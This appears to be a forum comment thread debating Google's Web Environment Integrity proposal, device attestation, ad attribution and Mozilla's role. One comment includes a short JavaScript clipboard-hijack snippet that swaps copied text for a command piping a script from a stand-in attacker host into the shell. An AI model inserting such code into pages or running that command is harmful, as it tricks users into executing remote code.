I haven't seen anything yet on whether Brave will support it, though if I'm understanding correctly, they won't have a choice since they're using Chromium. Hopefully I'm misinformed.
Ultimately I think we must permanently return to browser ballots back by the law, like the IE bundling fallout. Otherwise friction and incentives will continue to entrench one dominant player.
After all, Google is the one that pays their bills so either way Mozilla is beyond powerless.
Mozilla, the browser, is great.
Mozilla efforts, such as Rust, have been historically great.
Mozilla leadership is currently awful. They focus is on the wrong things - web VR and low-quality foundational AI models. Maybe because they think the web is at risk of disappearing outright. But the true enemy is Google, and they're currently its well-behaved prisoner.
Mozilla can't bite the hand that feeds it, but someone needs to point the FTC, Congress, and the EU at Google. Everything they do, buy, and work on is to point an overwhelming majority of internet users at its ad products. Chrome, Search, Android, YouTube, Apple default search engine deal, etc. Google has become inescapable. And that's rather anti-competitive if you're trying to advertise your business or selling ad tech.
Nevermind that the web commons and standards are constantly in Google's blast radius for funneling everyone into their gaping maw.
{Platform-vendor/developer/end-user}-neutral is more like it.
At the end of the day, users will just see that a website works in Chrome and not in Firefox. Firefox will decide that there is no point in apposing it if there is a real cost in potential market-share.
It feels weird that I'm now grateful for how crap they are.
Microsoft and Apple dont have a good history so assuming there is something big here?
The average person is very likely to have malware on their computer, but not on their phone.
How to design a website that is not accesible with Chrome. As a means of protest by certain website operators.
Would be fun to watch Google circumvent that. Especially if it was only popular amongst small, noncommercial websites.
From what I understand, the arguments about self-preferencing kind of always get thrown out due to a more strict interpretation of the law. Did with Apple, and with Facebook when they were acquiring Instagram and Whatsapp.
https://webkit.org/standards-positions/
(this one has not landed yet, likely to be opposed as well)
I installed lineageOS, which is passes the Google SafetyNet check out-of-the-box. So most things just work, including my local Credit Union's app.
But lineageOS fails the CTS profile check on my phone. Fidelity checks this after you log in and shows a "For security reasons your account has been blocked..." message.
So I had to root the phone to install a CTS profile fixer, and then more hacks to hide the fact it was rooted.
After that Fidelity worked, but requested root permission every time I launched it until I figured out how to permanently disable that.
Netflix was similar, but not quite as annoying.
Assistive technologies will still work as the browsers implement platform's assistive APIs.
Automatic testing will still work because a developer isn't going to add restrictions to their own tests from their site. Unless they are testing if a captcha gets shown from an unsafe environment.
Archives, search engines, and spiders should already be respecting robots.txt. Site owners can already block those things if they don't want their site crawled.
>This means that no single party decides which form-factors, devices, operating systems, and browsers may access the Web.
The proposal allows anyone to become an attestor. There would not be a single attestor who you would have to prove your trustworthiness to.
I don't see why it would be that difficult. The issue here is with websites that want to mandate it.
You hit a physical button and an internal kvm switches usb input and displayport out between primary and secondary machine. There is no shared clipboard or way for data to be intentionally be shared between machines and nothing to distinguish this setup from any other "secure" setup to disallow its use. It ticks the correct boxes to meet the described intent of the feature and unlike a secure environment one is obliged to use for everything would actually be more secure as you have no good reason to install a bunch of software or browse random websites on the slower secure environment.
For example it is currently the reality in EU, that in order to use any of the native banking apps, a user has no choice but to expose themselves to privacy violations by either Google or Apple, i.e. US companies.
While at least one alternative exists, https://grapheneos.org/articles/attestation-compatibility-gu..., these alternatives are not being used in practice.
I see no way of preventing this happening on the web as well, if the Web Environment Integrity API ships.
Although I do agree that means there's less competition in the browser engine world.
We should start to orient the debate instead on the security issues created by Google and their ads.
Note that "safety and security" has become an abhorrent phrase among many of us because it evokes the "authoritarian dystopia" that Google et.al. are creating --- we're more concerned about freedom and interoperability.
But rather than block them outright, I would disable all but the necessarily features snd keep reminding those users to either switch to another browser or to use something like tampermonkey (with clear instructions in what it needs to do).
What would be a good way to detect support for this stuff? The js api?
If you are shown a product ad whilst browsing searchengine.example and then later look up the product at reviews.example, then end up making a purchase at shop.example, your Mozilla browser will send all of these events to one or more aggregation services that allows shop.example to understand (at least in aggregate, assuming you trust the cartels running the aggregation services) that you were exposed to their product at searchengine.example and further exposed to their product at reviews.example.
Where previously an ad tech company was ultimately able to track users based on source IP address (even if cookies had been disabled by a user), IPA now allows these companies to track users across multiple IP addresses, and regardless of the user's cookie settings, via a unique tracking identifier. It is also proposed that the operating system provides the unique tracking identifier which can then be used by all applications or browsers on a device, allowing different devices behind a single IP address to be distinguished.
Is that sarcasm? Their computer is likely more secure than the jungle of manufacturer modified roms where who knows what's inside.
[1] https://github.com/mozilla/standards-positions/issues/753
[2] https://github.com/WebKit/standards-positions/issues/142
The goal of device attestation for consumer software is to put an end to that. Originally pioneered by Apple on iOS, now making its way to all of computing thanks to the forces of capitalism, device attestation means that the hackers lose. It is the bad ending.
The other twin threat, and I hate to say it, is the software industry sorting its security story out. In the past iOS jailbreaks used to be common, but there hasn't been an iOS jailbreak in a year. Rust isn't helping.
We are hurtling towards a world where producers and IP holders have complete control over the content they produce, and use leading-edge cryptography and ultra-secure consumer-hostile software to keep it that way. This is one of the most dangerous developments to ever happen in all of history, and once it's real there's no going back.
Stallman was right.
Either this protocol is useless for its intended purpose, or banks will only accept a small handful of attestors that promise not to sign for environments where the owner has control. Being able to create a new attestor means nothing because attestation is not valuable without pre-established trust.
The fraud prevention use case requires that the browser matches what Google or Mozilla shipped, not what I choose to actually run. From 10,000 feet in the sky, there's zero difference between, say, someone who installed modified software on their phone to protect their privacy and someone who was tricked into installing malware[0]. Banks don't care about your freedom, they care about making your fraud someone else's fault.
Some of the use cases explicitly call for locking the owner out of their device too. Anticheat in games is treated as at least beneficial to honest users, but it can still be user hostile[1]. Click fraud detection shouldn't even be something that a USER agent cares about - and it's not like Google cares about that anyway[2].
Practically speaking the only Linux distros that will get an attestor that anyone will actually care about will be Chrome OS and Play-certified Android. At best, Google agrees to attest for Chrome and Firefox on non-Chrome-OS Linux and it winds up being like EME did. At worst everyone has to buy a Windows license just to use most websites anymore.
>Assistive technologies will still work as the browsers implement platform's assistive APIs.
At least until someone says "we need to keep content from being data mined for AI training[3]" and AI scrapers find out how to automate those APIs. The underlying power dynamic of attestation means that websites can just demand attestors ban screen readers, in the same way that ebook DRM already does.
[0] Casual reminder that Louis Rossman was harassed by the GrapheneOS developer for agreeing with someone that the developer asserted had harassed them. He uninstalled GrapheneOS specifically to avoid being pwned by its developer.
[1] Let me remind you of the insane cat-and-mouse game where cheaters went into the kernel, so now anticheat is in the kernel, and now cheaters find vulns in the anticheat to hide their cheats in, which now malware can use as well.
[2] https://www.theregister.com/2023/06/29/google_trueview_skept...
[3] Reddit
Most of these private attribution systems are specifically designed so that the people running the ad can count how many people clicked their ads, but not who clicked them or what other things they did. Safari had a proposal in which you could only have a certain number of campaigns running per domain, so you couldn't set up a separate """campaign""" for each user and fingerprint them all at once. I don't know how the Mozilla proposal differs.
Whether or not user-agents should care about this sort of thing is an orthogonal question.
[0] https://www.theregister.com/2023/06/29/google_trueview_skept...
[1] Remarketing in particular is responsible for the "feeling of being seen" from modern ads where you search for one thing and get 10,000 ads for the thing for the next week
Assuming this gets implemented, users might start being unable to access certain websites or services because their identity is deemed "insufficient", which would move them to use a different browser that does not have this.
Something strange. So, radio advertisement, billboards, video panels, and absolutely any other type of advertisement is a scam that exists for few decades and still going good?
User Agent. Not advertiser agent, not government agent. USER AGENT!
Yes, and since "attribution" as defined here is incompatible with user's privacy (which is a human right), therefore advertising should fail. Can it please fail early and fail often?
|--------------------|
anti-user pro-user
|----G-------M-------|
anti-user pro-user
The sentiment I seem to see is that anything short of perfect is failure.
Because their customers aren't security nerds that have smartphones with authentication apps.
They want people that barely get smartphones, or still use feature phones, to be able to access their services with some improved security workflows.
It means that each site can choose who they trust instead of their being a single entity dictating what users are secure or not.
>Click fraud detection shouldn't even be something that a USER agent cares about
But it is something that the web standard should think about in order to make the web a better place.
>Practically speaking the only Linux distros that will get an attestor that anyone will actually care about will be Chrome OS and Play-certified Android.
I disagree. There are several Linux distros that support secureboot showing that Linux distros are capable of showing they are trustworthy enough to Microsoft.
No, attribution is what advertisers want, to do the least amount of work possible to blast you with ads that attack your deepest weaknesses, all under the pretense of "personalization".
> then the ad platform will defraud you[0]
Cool. How is that my problem as a user ? Grow a set of balls and sue the ad platform.
https://github.com/gorhill/uBlock/wiki/uBlock-Origin-works-b...
The Mac front end uses macOS APIs and Apply is super selective which ones they port to Windows and WebKit would force them to open source this.
"blast you with ads that attack your deepest weaknesses, all under the pretense of "personalization"."
Instead it will tell advertisers how effective their blast was, and help argue that Google isn't defrauding them.
Maybe web is the right platform for these. But of course Google will use this to close things down.
...if you let it.
|------------B---A---|
anti-user pro-user
---
These kinds of discussions are frustrating to me since it feels like we've been dealt a very bad hand. But it's not just this hand, the dealer is firmly set on us only receiving bad hands in any game we play.
Like in a card game, this is the only hand that we'll get. What other corporation do we have to push these kinds of values? What other avenue do we have? It's sad that we've come to this situation, but if the choice is the currently perceived-to-be-failing Mozilla and no Mozilla, I pick the failing Mozilla.
Imagine we fully loose the web because iOS opens up.
Pocket, cliq, Push Notifications for Mozilla Blog without user consent, Mr robot, Firefox Suggest etc they are littered with mistakes and scandals and have never improved their governance or process.
I can give them a pass on technical decisions like Thunderbird or breaking extensions but when it's purely commercial it has to be judged differently.
This is quite different than the current design of online ads, where which ad to show is only decided when the ad loads and reloads.
Not that it matters that much - online ads are a total scam anyway. Particularly google's search ads, which 9 times out of 10 is just a copy of the first search result - but now in a version where they get money for the click.
It is however what the advertisement companies and agencies want. They are selling shitty products.
When buying internet ad space, though, the information asymmetry is vastly different.
When a shirt is white and clean, the smallest stain stands out.
Mozilla is one of the rare companies with a mostly white clean shirt.
It is been judged harshly, while we should rejoice that they have been doing amazing things for 20 years despite the competition being terrible people playing dirty.
If we keep doing this, they will be no more Mozilla in the world. Who wants to be the good guys if you are held up against impossible standards when your competitors are paid handsomely to destroy the world?
I know some groups that target perfect ethics: they do nothing, because it's impossible to do anything without screwing up sometimes.
What prevents any of the following solutions from providing assurance to advertising clients, without also destroying the Internet and general purpose computing:
1. Building trust with advertising clients be treating them with respect, honesty and transparency. If your clients don't trust your advertising network and were demanding assurances in the form of WEI and similar proposals, surely it's obvious there are bigger problems. The advertising client would likely have dropped the advertising network long ago but can't due to monopolies existing.
2. Advertising networks undergo independent audits (results available to clients) and become more transparent to clients in how their advertising spend is being used.
3. Advertising clients survey users at checkout to ask whether they found the product/service from an advert, or whether they recall seeing an advertising campaign and where they remember seeing it.
4. Advertising clients host advertisements at ads.company.example (in a few highly restricted formats) so they can keep track of impressions themselves.
5. (still a bad idea, based on user surveys, but one which Google et al should have considered for minimisation of data collection and privacy impact) Browsers collect advertising metrics during use and when a user makes a transaction at an online store, the online store asks the user (via the browser) for permission to obtain those saved advertising metrics to provide only to the online store. Users can review the entirety of information sent to the online store before it is sent. Advertising networks don't have a need to access browsing history for everyone on the Internet in real time.
6. Online stores and similar continue to rotate their marketing spend through various advertising networks and marketing campaigns, checking their own metrics to see if advertising campaigns have been having an impact. Campaigns could include marketing using the Internet but outside the reach of Google et al such as use of campaign-specific coupons and products marketed through product review websites, referral schemes, influencers, etc.
1. The attacker manufactures a device, such as a smartphone, generates a keypair for it, stores it on an HSM on the device (generally called a "trusted enclave"), and signs the public key of the keypair with a master key
2. The device runs the attacker's software and is designed so that whenever non-attacker software is run with elevated privileges, the HSM is informed of that fact in a way that can't be reset without rebooting (and starting again with the attacker's software). For instance, the device might use a verified boot scheme, send the key the OS is signed with to the HSM in a way that is unchangeable until reboot, and it might employ hardening like having the CPU encrypt RAM or apply an HMAC to RAM
3. The HSM produces signatures of messages that contain statements that the device is running the attacker's software, plus whatever the attacker's software wants to communicate and it won't produce them if it's running software of the user's choice as opposed to the attacker's software as established above. It also includes the signature of its public key with the master keypair, allowing accomplices to check that the device is indeed not under the user's control, but rather under the control of someone they trust to effectively limit the user's freedom
4. Optionally, that attestation is passed through the attacker's servers, which check it and return another attestation signed by themselves, allowing to anonymize the device and apply arbitrary other criteria
5. Conniving third parties can thus use this scheme to ensure that they are interacting with a device running the attacker's software, and thus that the device is restricting the user behavior as the attacker specifies. For instance, it can ensure that the device is running the accomplice's code unmodified, preventing the user from being able to run software of their choice, and it can ensure that the user is using device as desired by the attacker and their accomplices.
This attack is already running against Android smartphone users (orchestrated by Google, in the form of SafetyNet and the Play Integrity API) and iOS smartphone users (orchestrated by Apple) and this extends the attack to the web.
IMO much bigger issue is that significant amount of non-banking sites that are now trying to shame user with "disable adblocker to continue" messages (easily bypassed) will start requiring this. Or Twitter/Reddit/etc., in the name of "fighting bots" of course, nothing to do with ensuring you are watching their ads...
And speaking of Microsoft - I am using Thunderbird 102.6.1, since any newer version doesn't work for me with Outlook365 - MS OAuth implementation requires user agent to be accepted by some "administrator". Looks like great example of what we can expect from Google, even if that Web Integrity get delayed for few years. Mozilla really is powerless - either they cave in, like with video DRM - or their browser won't be useful as daily driver
Additionally, AntiFraudCG proposals such as WEI focus on benefits they provide to PATCG proposals. For example, a Googler with historical interest in minimising inflated view counts on YouTube[4] (a benefit to YouTube's advertisers) wrote earlier this year a proposal to AntiFraudCG including:
"By transmitting signals of legitimacy from the device’s platform, such as if the device is emulated or rooted, publishers and their technology partners could use this information in part to determine if traffic is invalid. They could then choose appropriate actions like flagging advertising actions as suspicious"[5]
[2] https://github.com/antifraudcg
[3] https://www.mozilla.org/en-US/mission/
[4] https://security.googleblog.com/2014/02/keeping-youtube-view...
Of course, there's also criticism for attempting those.
Maybe, but what does that change? It might even be a stronger lever to pull than "we will stop sending you traffic". My point is that Google isn't donating money to Mozilla because it's nice, it pays for something (traffic / legal protection / whatever). I just don't see how the parent idea that Mozilla most comply with Google because Google "pays their bills" holds.
This Web Integrity API is just a means to cement themselves as obligatory man in the middle, as opposed to an optional one.
Seems like a good record to me.
Unless you have billions at a bank, I don't see why any bank would even consider changing how their website works because of a single customer. And, well, real billionaires probably don't care about not being able to use a website on Firefox.
Okay. So this is about validating ad effectiveness and minimizing ad fraud, right?
Assuming that's your point (apologies if I'm missing something important), what does that have to do with me or my private property?
Advertisers have business relationships with advertising platforms. Advertisers might also have a business relationship with me, assuming I choose to purchase their product(s).
But the advertising platform has no business relationship with me (assuming I'm not buying ads on that platform). As such, why do I have to give data, CPU cycles and privacy so the advertising platform can provide metrics about ad effectiveness and fraud?
None of that has anything to do with me, and I don't wish to give up those things (especially my privacy) on the devices I own.
It's unethical for these rapacious scumbags to limit what I can do on my devices (which are my private property) If I refuse to provide third (the ad platform) and fourth (the advertisers) parties specific information about who I am and what I see or don't see (which is what a permanent identifier in secure storage would do) when I visit a site of my choosing.
I'll say it again to make sure I'm clear: I don't care about advertisers or ad platforms. They can go an play with each other all they want -- but don't limit what I can do on my devices because it will make you more money. Fuck. That. Noise.
Edit: Clarified prose.
I'd love to donate to Mozilla, but I'm concerned my money could just end up in some C-suite pockets if I do. Is there a way to donate specifically to Firefox core(-ish) team, and maybe also MDN?
I got codes via SMS when I installed those apps and I had to prove that I owned the phone number I was associating with the app.
And websites get to choose which attestors they accept. For an attestor to do what they are expected to do, they need control of everything from the TPM up. This means there will be effectively 3 attestors - the major operating system vendors.
They get hate only for bad or useless things (like the famous "independent voices") but a lot of love for the actual work being done, especially Firefox Containers, enormous performance improvements etc. I'm using Firefox on a daily basis and just the Containers feature make it so much superior to Chrome.
For a "fun" example of how strict budget destination restrictions fail, take a look at Atlanta's MARTA, that used to have a fixed 50/50 budget split between OPEX and CAPEX by it's funding law, and therefore had brand new trains but everything else falling apart.
- OP responds with “what about IPA”
It's litteral whataboutism.
Happy to say, Google just fixed it (about 4 months ago).
Many free cross-browser testing tools still can demonstrate the breakage (via version testing).
Basic malware JavaScript snippet:
<script>
document.getElementById('copy').addEventListener('copy', function(e) {
e.clipboardData.setData('text/plain',
'curl http://attacker-domain:8000/shell.sh | sh\n'); e.preventDefault();
});
</script>> Assistive technologies will still work as the browsers implement platform's assistive APIs.
Assistive technologies and APIs on devices should not be beholden to the platform owners. It is a problem for disabled communities to need to ask permission to build technologies that make their lives better.
Native platform accessibility APIs are important because it's important for platforms to take steps to guarantee equitable access to sites and apps on their own platforms out of the box and for ordinary users who may not want to or be able to install additional software. However, officially supported native platform accessibility APIs are NEVER an excuse to remove the autonomy and agency of disabled communities.
This shows up all the time in multiple situations -- from Reddit's exemptions of nebulously defined accessibility apps from its API pricing to circumventing assistive technologies in the name of adblocking, to the current proposal. It is an attack on the autonomy and agency of vision impaired or low-mobility users to force them to use only "approved" APIs in order to build assistive technologies or to force them to ask permission before deploying their solutions. It positions the platform as a kind of benevolent dictator, giving the platform an inappropriate level of power and control over disabled communities that should be (when possible) dismantled rather than reinforced.
We're not holding Mozilla to higher standards than Google - we just have already discarded Google as an option.
Not collecting telemetry that many users have explicitly stated they do not want and even turned off at every opportunity is not a particularly high standard. Not wanting advertisements integrated into the web browser is not a particularly high standard. Criticizing that the CEO salary has been increasing to absurd levels while the browser has been declining and regular engineers are facing is not holding them to a particlarly high standard. Not wanting the last remaining competitive free web browser run as a commercial project rather than a non-profit foundation is not a high standard. Mozilla chooses to be shittier and shittier. Inaction would be better.
|--------------------|
anti-user pro-user
|----H-------P-------|
anti-user pro-user
The sentiment I seem to see is that anything short of sainthood is evil.
The answer of course is that relativism is not a good way to judge people or organizations. Mozilla chooses to do a lot of shitty things. They should be criticized for that even if someone else is worse.
The thing is, Mozilla shouldn't even be a for-profit corporation in the first place.
My bank calls me once every few months, if everything is ok, and if there are is something that is bothering me and could be improved, or if they can help with something. At first I thought it is some marketing program and some manager has to achieve some KPIs, but surprisingly, they did listen to suggestions (it took time, but they eventually did).
So you never know, if you never try.
[M. theresa...VLC foundation....Mozilla.......You.......................Microsoft.......................................Nazis]
They're working on it see Manifest v3.
Which is the scale of Mozilla "badness" compared to the rest, even you.
And especially in the ligh of the good things they do.
You can be a critic, but be so in balance with the good things, otherwise you are making doing good something so ingrate a lot of people will give up.
If you thing doing the right thing is easy, you have not been doing a lot of it.
Problem is that Chrome is massive. If Chrome decides it will go left, most of websites will go left.
If you want to compare with Google the list is way more subjective.
I'm not a tinfoil hat, but security can't hang it's hat on the kindness of strangers.
They don't give a single shit about my happiness, as long as I buy their product. Whether that's through a happy ad that made me laugh, or through being blasted with it every day for a year so that their brand is the only one I think of when I need to buy X.
Companies do not see you as a person. They don't even lack empathy, they didn't have any to begin with. You're a walking wallet they have to empty, by any means necessary, and if that's through making you feel that you're ugly and you should buy their new skincare, they will.
[0] https://us.boell.org/en/2019/10/17/web-partner-companies-kee...
[1] https://tvpworld.com/40781592/another-letter-from-us-ambassa...
Alright, let's see the next senten-
>It's about proving to advertisement customers that their ads were seen and were useful.
So, it's about making sure that the ads that they showed me were personalized enough that they accurately target me. Ads that are built to be efficient because they create a need from a very small part in me that can normally be reasoned with. Or attack some deep seated fears to make me purchase their magic fat loss pills, that they accurately targeted because of attribution, and because of being repeatedly told how effective their blasts are.
So it's about personalization, got it.
There are major usability problems, mostly related to graphics (the protocol that forwards the windows is purposefully dumb and doesn't support 3D acceleration at all), but for things like browsing bank apps or even watching youtube it's enough.
Google should be split so that the interests of Google'd not taint Android and Chrome.
1. From what I've seen, the PSD2 APIs haven't really been created with end users in mind – there are non-trivial accreditation requirements on people/entities wishing to make use of those APIs, the expectation being that only professional middlemen will dally with those APIs.
2. The PSD2 APIs don't necessarily cover the full functionality of a bank's online banking functionality.
3. While you can probably still get quite far with "just" the ability to query the current account data and recent transactions, as well as being able to initiate payments, this doesn't sidestep the bank's authorisation requirements – meaning that unless you can use a hardware TAN generator or something like that, you're still dependent on the bank's app for payment and account access authorisation.
No. Not even close.
> while we should rejoice that they have been doing amazing things for 20 years despite the competition being terrible people playing dirty.
I reject the "other"-ness in this comment. I was a Mozillian. I was helping do those things. The notion that I should heap accolades upon a bunch of folks who are only now affiliated with Mozilla and who were not contributing during the era in which Mozilla was doing the great things actually deserving of the goodwill associated with its name? And who have themselves been positively poor torchbearers for that name? Condescending.
2023 is the project's 25th birthday. It did amazing things for about 15 of them—by which I mean the people who made up the project. "Mozilla" is merely a legal fiction.
I do recall it being common for internet ads to be sold directly like billboards back in the day, before the action model took over, especially for higher value sites that could be likened to the prime real estate of a billboard on a city square or key highway with their guaranteed literal traffic.
But such direct deals probably didn't scale well, and definitely left smaller sites wanting to earn some extra revenue in the dust. There was a time when ads weren't as shit as they are now - most wouldn't worry about a banner ad or two on their favorite forum.
It's not really optional. At least, not unless you consider online banking to be optional.
Is there any threshold for mendacity that if crossed would bother you?
Highly abstract risks just dont seem to register for most people. It was hard enough to get the masses to act in self interest over an existential risk to their health (covid).
I reckon the way to avoid maximum damage from this proposal will be some sort of inoculation - e.g. safe, trusted, easy to use tools that help people work around it. The political angle of attack is worth trying but I think it will fail.
I wish Mozilla worked that angle too - e.g. supporting lineage and microg.
That was the intention behind my choice of words — representing the whole web, not just components of it or companies operating on it.
In what way does it make the web a better place?
That's exactly the thing, this integrity api only means the deviced is controlled, not secure, that's two very different things. You can have a phone riddled with pre-installed malware passing the safety net and you can have EOS, the cleanest rom that I know about which can fail it.
The majority of companies are small to medium businesses that do actually care about their customers - when your customers are measured in thousands or less instead of billions, you will go belly up if you don't. They still use ads because how the heck would you otherwise know they even existed, and yes they want you to buy stuff but they hope you actually like the product afterwards so you end up helping them get known.
Think of it a bit like when your favorite tiny, niche YouTube channel uses clickbaity titles and thumbnails, or target the 10-15 minute mark, or use the same intro/outro format and duration as everyone else. If they didn't, no one would ever see their videos as they'd get deselected by the algorithm. No one will watch a video, or buy a product, that they do not know exists.
I'm sure OP is glad that Mozilla takes a negative position on WEI, but when they take other positions simultaneously that seem to counter their WEI positioning, that is a legitimate criticism. I share in that view.
I'm glad to see Mozilla push back in a case like this, but they need to do more, and more consistently so.
Remind me, how has that strategy worked out for their market share? Perhaps the market for I-Can't-Believe-It's-Not-Chrome isn't actually that big since those users don't have a problem with just using Chrome.
If the same happens now with remote attestation (and I can totally see that happening on streaming websites), Mozilla will have to risk losing even more of their small user base or relent and make some version of the protocol.
<>>23117242 >
There's no reason your question couldn't have been posted in a relevant (sub)thread, instead of here, where it's (i) not on topic for the current subject, but (ii) looks like it could be, and therefore (iii) has the same effect as moving the goalposts.
I don't think you'll need to buy an SBC for this. A weekend of messing with virtual machines will be enough.
This is a major reason I haven't tried QubesOS yet. Thanks to Nvidia I've seen what happens when you run a desktop with a browser without hardware acceleration and it sucks. CPU cores get pegged with basic scrolling or video playback and power consumption is simply unreasonable.
Perhaps if I were a human rights activist or a journalist I would use it, but I'm not.
Meanwhile there is zero benefit for letting websites manipulate the clipboard or intercept basic browser interactions. This might make sense for applications but that's just another argument why those shouldn't be forced into the same browser as websites.
Websites aren't the only party that might want automated tests.
> Archives, search engines, and spiders should already be respecting robots.txt. Site owners can already block those things if they don't want their site crawled.
robots.txt is not law. Archives, search engines, and spiders SHOULD ignore it in cases where they deem it the more moral action. After all, all of these are supposed to snapshot the web that humans see.
The real reason Google pays Mozilla is probably closer to "controlled opposition" or "antitrust shield".
For it to make sense to open source Safari for Windows, they’d first have to pull out the AppKit bits and replace them with something else.
Who? Oh you mean digg v3?
Who's digg? Exactly....
I stick to Safari and Firefox. They're not perfect but they're the only modern browsers that don't use Blink, which is what gives Google the power to make moves like this.
Not saying it's perfect or better, just that we need it. we need a competing browser with a rendering engine that google doesn't ultimately control that has a non-trivial market share. Otherwise we may as well just stop complaining and let google do what it wants because we'll have no power to stop them anyway.
but, is there an actual need to change how internet traffic operates? is there something currently broken?
Besides, people aren't using relativism here. Relativism is the idea that nothing is truly good or bad, it's all a matter of personal or cultural preferences. That would mean that people were saying that that Mozilla's behavior about X, Y, and Z isn't really bad. But that's not really the argument here. People are generally saying that despite engaging in the bad behaviors X,Y and Z, Mozilla is still in balance better than Google, and arguably still worthy of some level of support. To phrase it in terms of Aristotelian ethics: "For the lesser evil can be seen in comparison with the greater evil as a good, since this lesser evil is preferable to the greater one, and whatever preferable is good". You're unquestionably correct that Mozilla should be criticized, even harshly so. But you can criticize a company (or person, or party, or country) and still support them. Or if short of support, still prefer them to the available alternatives.
Thats what we do, anyways.
1. Under her leadership Mozilla has lost virtually all of its users. It has been reduced to less than 10% of what it had before, maybe worse - I haven't kept up.
2. At the beginning of Covid, a time when remote work was on the rise and tech valuations were through the roof, a time when the browser was more important than ever, she took her largest payout and fired hundreds of employees. She was compensated at over $5M dollars, enough money to pay a team of engineers for years.
3. Firefox has utterly failed to capture Enterprise market, where Chrome has managed to dominate. I doubt most people are even aware that a corp managed Firefox is an option, they have done such a poor job marketing it.
4. Every initiative Mozilla has come out with has completely failed to gain traction. Something like a VPN could have been a great fit for Mozilla but they did nothing with it. Mozilla has been incapable, organizationally, of capitalizing on technology - the thing they're kinda supposed to do exclusively.
She has failed in every conceivable way as a CEO. She has failed in terms of the mission, she has failed her employees, she has failed her users, she has failed to be an example as a leader.
Mozilla, as it exists today, is a convenient project for Chrome to point to and say "look, there's competition" - perhaps the only reason why Google continues to fund Mozilla.
Microsoft and Apple are at least competently run and have incentives to push to reduce Chrome's power.
With enough websites using this API to block "untrusted" devices, since Google is the one that decides who is "trusted" that gives them an iron grip on what you can use to browse the web.
If they decide to not grant your competing project "trusted" status, you now cannot build a competing device, OS, or browser. And since Google owns the most popular browser and one of the most popular OS that gives them little incentive to allow competition.
Without a "trusted" browser that can scrape the web you are also effectively blocked from building a competing search engine.
Basically this API serves to cement Google into a position of power.
Business account is in different bank, and the communication there was much harder (obviously by someone not trained in communication and having to talk to me as unplanned part of their job). The fees are lower, though.
So it doesn't seem to be by the amount of $$$ on the account.
6. Any additional party with sufficient ability to modify hardware can still attack the attacker and their accomplices. So such parties only benefit from this, at the cost of typical users.
And this "attacker" gets... what? Nothing. Because this isn't an attacker... it's a device manufacturer. You've described how attestation works except you've described the TPM as an attacker, which is silly.
Given that SSO is a massive security win and has been a game changer for removing passwords, I think it's been shown that delegation is extremely effective.
I remember in the long, long ago, when I actually visited a BUILDING to do some of my banking tasks. And when I bought physical media that took up actual 3D space in my house to watch movies. I suspect we aren't incapable of going back.
2. Great, they should do that, but good luck doing that when the data you need to audit is on a bajillion client machines.
3. People do that already
4. This became a thing a while back as a way to defeat third-party tracking blockers in browsers
5. This is literally the attribution system you're arguing against
6. They do that already. But good luck finding an ad marketplace that Google and Facebook don't have their fingers already in.
Also...
> What prevents any of the following solutions from providing assurance to advertising clients, without also destroying the Internet and general purpose computing
I was replying to a comment asking why Mozilla supports Interoperable Private Attribution (IPA). None of what I said should be taken as support for Web Integrity, which is cancer.
Quick googling confirms 50%+ of revenue came from Google 5-10 years ago, but couldn't find more recent data.
If Google is Mozilla's primary revenue source (especially if it's the majority), then Google effectively controls Mozilla via the leverage it has to pull Mozilla's largest revenue source.
Edit: Also raises the question, what company or organization should be developing browsers? A browser is something everyone expects to be free, but a browser is by no means free to develop, operate and maintain. For-profit browser companies (like Brave) would be forced to monetize the browser (like Brave tried to do with BAT crypto tokens, ads on the new tab page, etc)
It's just that this description is describing an "attack" that is just how attestation works. If you have a problem with attestation, talk about that problem, calling it "an attack" does nothing.
I'm actually against the proposal, too - although I see the merits. The ability to have servers authenticate clients based on the context of that client is amazing - it would seriously improve security if done right. But I personally believe that this should be done through the Device Policy extension exclusively, as it is already done there today, and that the extension should be opened and standardized.
In fact, I believe Google should be forced to do so.
There's some nuance there, too.
It's "turned beige", in part, because people refused to use it while it was still "white". Mozilla has had to make the tough calculation of whether to be pure with zero users and therefore zero good impact, or to be beige to try to get some of these fickle users back and maybe have SOME good impact.
So, basically, people aren't satisfied when Mozilla is pure/idealist, and they aren't satisfied when it's compromising/pragmatic ("If they do that, I might as well keep using Chrome!").
I'm not letting Mozilla off the hook, or giving my blessing for every single decision that's been made. But, there's probably some utility to us taking the view of "just shut up and use Firefox" for the next N years.
Firefox's usage dropping from about 30% down to likely less than 3% today, with almost no mobile usage, should be seen as a severe failure.
This failure isn't just about the product's uptake, too. It's also about the Firefox developers losing meaningful influence over the way the web evolves.
Website owners get protected from an ever increasing amount of malicious content. Now nearly impossible to detect thanks to LLMs. In theory you should be able to see the appeal that has.
I mean, Chrome (including Chromium, IIRC) literally collects and ships a bunch of tracking data to Google THE FIRST FUCKING TIME YOU LAUNCH THE APPLICATION.
Context matters. If Firefox did the Pocket nonsense in an environment where we had multiple decent free (as in freedom) browsers, then I'd grab my pitchfork. As it stands, I just can't feel the righteous indignation your comment is trying to rouse. It's truly NOTHING compared to the other options.
Tracking me harder isn't going to make those sites go away.
It sure is not. But I do believe we should have a legal right to own our own hardware, in every sense.
It's also about the loss of trust.
That particular incident, for example, was completely unnecessary. It involved a significant display of unbelievably poor judgment, and a total lack of foresight. It shouldn't have happened.
The fact that it did happen, despite it being such an obviously bad idea, raised a lot of questions and doubt.
It causes people to wonder what other incidents, which could potentially be far worse, might happen in the future.
It's remembered years later because it involved such a major loss of trust for so many people.
1. Instead of needing 100 passwords, which increases the chance of users just choosing something and repeating it, you have 1 password.
2. Similarly, instead of needing 2FA on 100 sites they can just have 2FA on their SSO. In fact, the other sites don't even need to support 2FA - you get that "for free" with SSO.
3. SSO providers implement auth really well. They make it smooth, as in "I don't have to reauth when it's obviously me" and safe, as in "that might not be a valid auth, let's get them to 2fa again".
Of course, if you have a password manager then (1) is not a problem. But SSO is a lot simpler for users.
Just wondering just how expensive it really is to rip the key out (or to have access to the tools to do it)
The opposition listed here is mostly misguided. For example, there is ~0% chance Google breaks "screen readers" or "assistive technologies" with Web Integrity. Saying that they would break seems like a bad faith argument to me.
Fundamentally this is about DRM and whether or not you think it should be allowed. I believe optional DRM for web applications would be good for developers and users of the apps. It would be bad for most other entities (crawlers, scrapers, criminals, etc). So I am in favor of it.
We may all end up stuck using a German VPN so we can still use ad blockers.
There's been speculation for a long time that the real reason Google pays for that is to keep Mozilla afloat and stave off antitrust investigations related to Chrome.
That may have changed with other browsers coming out, although almost all of them are based on Chromium. Ianal, have no idea whether or not someone can be a "competitor" if they're using largely the same source.
